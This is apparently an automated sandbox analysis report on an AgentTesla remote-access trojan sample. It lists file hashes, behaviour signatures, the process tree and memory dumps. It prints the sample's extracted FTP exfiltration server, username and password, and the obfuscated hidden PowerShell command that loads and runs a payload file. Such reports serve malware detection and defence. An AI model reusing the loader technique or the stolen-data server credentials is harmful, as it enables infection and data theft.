Analysis

  • max time kernel
    147s
  • max time network
    145s
  • platform
    windows7_x64
  • resource
    win7-20240220-en
  • resource tags

    arch:x64arch:x86image:win7-20240220-enlocale:en-usos:windows7-x64system
  • submitted
    22-05-2024 07:13

General

  • Target

    16aac40d13ff71f987a8895cc0f31fca.exe

  • Size

    869KB

  • MD5

    16aac40d13ff71f987a8895cc0f31fca

  • SHA1

    9a1a7ae7d79971f01e12a9804291e317a564b421

  • SHA256

    37723a2d00f77a033021a408e74b3ab780f65785a57d31d59633482b01291ccb

  • SHA512

    20a35605454025da9f7b426dea274aa8f660e28ba6bd7cef4bbf45c14c04a88c5fd8888f8c78055e110e036ddbd6d011e8461cd04e06c50aa6df1c738593dcc8

  • SSDEEP

    12288:2TdHutP4ws2ERwu7FHH1Khx1NwkvrpJrqVonoV5Ekikwh+:2Ti4L2uwupn141xtxoV5Okx

Malware Config

Extracted

Family

agenttesla

Credentials

  • Protocol:
    ftp
  • Host:
    ftp://ftp.piny.ro
  • Port:
    21
  • Username:
    [email protected]
  • Password:
    playingboyz231

Signatures

  • AgentTesla

    Agent Tesla is a remote access tool (RAT) written in visual basic.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 10 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 14 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\16aac40d13ff71f987a8895cc0f31fca.exe
    "C:\Users\Admin\AppData\Local\Temp\16aac40d13ff71f987a8895cc0f31fca.exe"
    1⤵
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:2364
    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "powershell.exe" -windowstyle hidden "$Unmortgaged=cat 'C:\Users\Admin\AppData\Roaming\sidonian\Oeret.Eft';$brothel=$Unmortgaged.substring(77103,3);.$brothel($Unmortgaged)"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2984
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\system32\cmd.exe" "/c set /A 1^^0"
        3⤵
          PID:2696
        • C:\Program Files (x86)\windows mail\wab.exe
          "C:\Program Files (x86)\windows mail\wab.exe"
          3⤵
          • Suspicious use of NtCreateThreadExHideFromDebugger
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2372

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Roaming\sidonian\Oeret.Eft
      Filesize

      75KB

      MD5

      e56fd41d73a77a5af876ac27129d627d

      SHA1

      789a07b1cd02384ba8fa4c705190be279810b0a0

      SHA256

      b90e7137becc4da8ac38cf1eb2f848329fff796f0485b427d69c72dc999dba10

      SHA512

      ad13b91cb9fb6e4b310692c51dd15524cc01fc0d4fc757a303804c8ad1b8e9ae63e1cfda12b4d987b3c6fd398d8674a5fc8abb10517e3ef3317ef37f3388d1cd

    • C:\Users\Admin\AppData\Roaming\sidonian\Windboat235.Mus
      Filesize

      325KB

      MD5

      2f7f976950c37010d9ea2f06cdc11aef

      SHA1

      e0144e85fae172c9357ff854464d7164b5382346

      SHA256

      4e4221d85da21d9d2eddea0546bc15be878a51befe4720e62314ea1fc5ec8b28

      SHA512

      48d322945d2b7ae80a86de9931d5a8b0b4bcc1cf97be528609a3ec518a58f2762adbb6b495fde86bc15d829d652500e67b34b03474a2687a46b930a61f3e2da1

    • memory/2372-19-0x00000000008D0000-0x0000000001932000-memory.dmp
      Filesize

      16.4MB

    • memory/2372-20-0x00000000008D0000-0x0000000000912000-memory.dmp
      Filesize

      264KB

    • memory/2984-9-0x0000000073BD1000-0x0000000073BD2000-memory.dmp
      Filesize

      4KB

    • memory/2984-11-0x0000000073BD0000-0x000000007417B000-memory.dmp
      Filesize

      5.7MB

    • memory/2984-10-0x0000000073BD0000-0x000000007417B000-memory.dmp
      Filesize

      5.7MB

    • memory/2984-12-0x0000000073BD0000-0x000000007417B000-memory.dmp
      Filesize

      5.7MB

    • memory/2984-13-0x0000000073BD0000-0x000000007417B000-memory.dmp
      Filesize

      5.7MB

    • memory/2984-17-0x0000000006580000-0x000000000907A000-memory.dmp
      Filesize

      43.0MB

    • memory/2984-18-0x0000000073BD0000-0x000000007417B000-memory.dmp
      Filesize

      5.7MB